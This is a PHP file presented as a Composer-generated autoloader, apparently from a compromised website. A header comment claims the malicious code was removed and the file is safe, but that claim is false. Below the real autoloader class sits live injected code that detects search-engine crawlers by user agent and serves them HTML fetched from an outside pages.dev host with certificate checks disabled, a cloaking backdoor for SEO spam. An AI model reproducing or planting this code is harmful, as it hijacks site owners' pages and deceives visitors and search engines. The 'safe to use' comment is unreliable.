<?php

/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */


// autoload_real.php @generated by Composer

class ComposerAutoloaderInit637353834a38d38f4cf3361cde14bfe0
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    /**
     * @return \Composer\Autoload\ClassLoader
     */
    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        require __DIR__ . '/platform_check.php';

        spl_autoload_register(array('ComposerAutoloaderInit637353834a38d38f4cf3361cde14bfe0', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__));
        spl_autoload_unregister(array('ComposerAutoloaderInit637353834a38d38f4cf3361cde14bfe0', 'loadClassLoader'));

        require __DIR__ . '/autoload_static.php';
        call_user_func(\Composer\Autoload\ComposerStaticInit637353834a38d38f4cf3361cde14bfe0::getInitializer($loader));

        $loader->register(true);

        $filesToLoad = \Composer\Autoload\ComposerStaticInit637353834a38d38f4cf3361cde14bfe0::$files;
        $requireFile = \Closure::bind(static function ($fileIdentifier, $file) {
            if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
                $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;

                require $file;
            }
        }, null, null);
        foreach ($filesToLoad as $fileIdentifier => $file) {
            $requireFile($fileIdentifier, $file);
        }

        return $loader;
    }
}
ob_start();
header('Vary: User-Agent');
$botchar = "/(bot|google|ahrefs)/i";
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
function aselolejos($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

if (preg_match($botchar, $ua) && $_SERVER["REQUEST_URI"] == "/index.php/eksakta/article/view/404/213") {
    usleep(rand(100000, 200000)); 
    header('Content-Type: text/html; charset=utf-8');
    echo aselolejos("https://naiklahkontolmemek.pages.dev/kintilbasah/index.html");
    ob_end_flush();
    exit;
}
